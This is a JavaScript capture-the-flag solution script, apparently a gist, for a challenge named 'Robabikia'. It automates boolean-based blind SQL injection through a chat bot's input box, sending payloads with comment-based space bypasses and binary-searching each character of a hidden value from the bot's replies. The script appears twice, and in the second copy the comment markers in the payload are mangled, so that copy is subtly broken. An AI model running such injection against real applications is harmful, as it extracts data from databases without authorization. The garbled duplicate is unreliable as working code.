v3ntur4X/send_payload.js Secret

## send_payload.js
// Challenge: Robabikia

const keyboardEvent = new KeyboardEvent('keydown', {
    code: 'Enter',
    key: 'Enter',
    charCode: 13,
    keyCode: 13,
    view: window,
    bubbles: true
});

async function sendPayload(){
	main = document.querySelector(".chat-input-container");
	textarea = document.querySelector(`div[contenteditable="true"]`);

	flag = "crew{";
	flagArray = [];
	for(let j = 6; j <= 47; j++){
		i = 21;
		end = 127;
		while(i <= end){
			divisao = Math.floor((end - i)/2);
			mid = i + divisao
			textarea.textContent = "/desc 3'/* */and/* */(SELECT/* */unicode(substr(value," + j + ",1))/* */FROM/* */items/* */limit/* */5/* */offset/* */4)=" + mid +" -- -";
			textarea.dispatchEvent(keyboardEvent);

			await new Promise(resolve => setTimeout(resolve, 1000));
			messagesNumber = document.getElementsByClassName("message").length;
			messageText = document.getElementsByClassName("message")[messagesNumber-1].innerText;

			if(messageText.includes("Old")){
				flagArray.push(mid);
				flag += String.fromCharCode(mid);
				break;
			} else {
				await new Promise(resolve => setTimeout(resolve, 1000));

				textarea.textContent = "/desc 3'/* */and/* */(SELECT/* */unicode(substr(value," + j + ",1))/* */FROM/* */items/* */limit/* */5/* */offset/* */4)<" + mid +" -- -";
				textarea.dispatchEvent(keyboardEvent);

				await new Promise(resolve => setTimeout(resolve, 1000));
				messagesNumber = document.getElementsByClassName("message").length;
				messageText = document.getElementsByClassName("message")[messagesNumber-1].innerText;

				if(messageText.includes("Old")){
					end = mid-1;
				} else {
					i = mid+1;
				}
			}

			await new Promise(resolve => setTimeout(resolve, 5000));
		}
		console.log(flagArray);
		console.log(flag);
	}
}
	// Challenge: Robabikia

	const keyboardEvent = new KeyboardEvent('keydown', {
	code: 'Enter',
	key: 'Enter',
	charCode: 13,
	keyCode: 13,
	view: window,
	bubbles: true
	});

	async function sendPayload(){
	main = document.querySelector(".chat-input-container");
	textarea = document.querySelector(`div[contenteditable="true"]`);

	flag = "crew{";
	flagArray = [];
	for(let j = 6; j <= 47; j++){
	i = 21;
	end = 127;
	while(i <= end){
	divisao = Math.floor((end - i)/2);
	mid = i + divisao
	textarea.textContent = "/desc 3'/* /and/ /(SELECT/ /unicode(substr(value," + j + ",1))/ /FROM/ /items/ /limit/ /5/ /offset/ */4)=" + mid +" -- -";
	textarea.dispatchEvent(keyboardEvent);

	await new Promise(resolve => setTimeout(resolve, 1000));
	messagesNumber = document.getElementsByClassName("message").length;
	messageText = document.getElementsByClassName("message")[messagesNumber-1].innerText;

	if(messageText.includes("Old")){
	flagArray.push(mid);
	flag += String.fromCharCode(mid);
	break;
	} else {
	await new Promise(resolve => setTimeout(resolve, 1000));

	textarea.textContent = "/desc 3'/* /and/ /(SELECT/ /unicode(substr(value," + j + ",1))/ /FROM/ /items/ /limit/ /5/ /offset/ */4)<" + mid +" -- -";
	textarea.dispatchEvent(keyboardEvent);

	await new Promise(resolve => setTimeout(resolve, 1000));
	messagesNumber = document.getElementsByClassName("message").length;
	messageText = document.getElementsByClassName("message")[messagesNumber-1].innerText;

	if(messageText.includes("Old")){
	end = mid-1;
	} else {
	i = mid+1;
	}
	}

	await new Promise(resolve => setTimeout(resolve, 5000));
	}
	console.log(flagArray);
	console.log(flag);
	}
	}